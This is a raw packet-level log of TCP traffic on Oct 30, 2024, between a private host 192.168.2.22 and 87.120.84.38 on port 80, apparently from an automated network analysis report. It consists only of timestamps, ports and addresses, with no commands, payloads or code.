                                                                                                          Oct 30, 2024 08:32:02.834341049 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.834357023 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.834386110 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.881181002 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.881198883 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.881213903 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.881254911 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.881280899 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.934367895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934391975 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934406042 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934423923 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934441090 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934454918 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934470892 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934485912 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934520006 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.934561014 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.934736013 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934752941 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934767962 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934793949 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934808016 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.934845924 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.934865952 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952538013 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952553988 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952567101 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952581882 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952596903 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952611923 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952626944 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952656031 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952656031 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952675104 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952861071 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952883005 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952898026 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952913046 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952913046 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952920914 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952929974 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952940941 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952948093 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:02.952958107 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952965021 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:02.952986956 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.000783920 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.000808954 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.000828028 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.000849009 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.000904083 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.000904083 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.052855015 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.052918911 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.052947044 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.052968025 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.052989006 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053010941 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053034067 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053060055 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053060055 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053134918 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053143024 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053191900 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053214073 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053235054 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053256989 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053272963 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053272963 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053294897 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053539038 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053612947 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053647041 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053668976 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.053673029 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053710938 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.053710938 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071306944 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071356058 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071377993 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071397066 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071403027 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071403027 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071419001 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071436882 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071436882 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071439028 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071464062 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071481943 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071526051 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071552038 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071572065 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071580887 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071588993 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071609020 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071609974 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071609020 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071631908 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071631908 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.071651936 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071667910 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.071785927 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.072433949 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.072454929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.072477102 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.072493076 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.072493076 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.072526932 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.119271040 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.119340897 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.119364023 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.119443893 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.119496107 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171497107 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171529055 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171545029 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171559095 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171575069 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171586037 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171602011 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171684027 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171684027 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171684980 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171751022 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171766996 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171786070 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171799898 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171806097 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171814919 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171832085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.171868086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171869040 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.171920061 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.172079086 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.172513962 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.172583103 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.172595978 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.172632933 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.189846992 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.189873934 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.189893961 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.189912081 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.189930916 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.189997911 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190047026 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190053940 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190073967 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190105915 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190121889 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190128088 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190149069 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190164089 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190210104 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190613985 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190651894 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190668106 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190685034 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190701008 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190730095 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.190973997 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.190989971 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.191004038 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.191031933 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.191056013 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.237868071 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.237914085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.237931013 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.237950087 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.237973928 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.238053083 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290386915 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290425062 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290445089 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290462971 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290482044 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290499926 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290509939 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290510893 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290522099 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290540934 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290540934 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290591002 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290855885 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290915966 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290930033 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290967941 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.290981054 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.290986061 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291006088 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291028976 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291034937 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291034937 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291034937 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291068077 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291084051 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291085958 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291110039 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291126966 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.291553974 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.291615963 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.308314085 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308336973 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308355093 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308433056 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.308434010 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308453083 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308468103 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308494091 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.308551073 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.308734894 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308748960 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308806896 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.308897972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308912992 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308928013 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308943033 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.308971882 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.309004068 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.309367895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.309384108 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.309400082 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.309413910 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.309429884 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.309439898 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.309464931 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.309490919 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.356432915 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356455088 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356472015 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356539965 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.356564999 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356580973 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356595039 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.356631041 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.356658936 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.408912897 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.408965111 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.408984900 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409015894 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409035921 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409059048 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409059048 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409059048 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409087896 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409096003 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409137011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409151077 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409204960 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409512043 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409528971 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409567118 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409598112 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409626961 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409684896 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409689903 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409703970 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409723997 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.409734011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409759998 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.409759998 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.410099030 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.410125017 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.410142899 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.410170078 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.410171032 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.410202980 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427088976 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427124023 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427139997 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427149057 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427155972 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427166939 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427174091 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427175999 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427191019 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427203894 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427371025 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427386999 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427402973 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427412987 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427424908 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427447081 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427642107 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427659035 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427699089 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427699089 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427731037 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427747965 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427763939 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.427776098 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427789927 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.427819967 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.428242922 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.428278923 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.428292990 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.428303957 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.428317070 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.428323030 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.468738079 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.468764067 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.468781948 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.468955040 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475137949 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475167990 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475202084 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475218058 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475219011 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475249052 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475249052 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475279093 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475308895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475333929 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.475374937 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.475374937 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.527906895 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.527950048 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.527966022 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.527967930 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.527982950 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.527987957 CET4916480192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:32:03.527997971 CET804916487.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:32:03.528001070 CET4916480192.168.2.2287.120.84.38
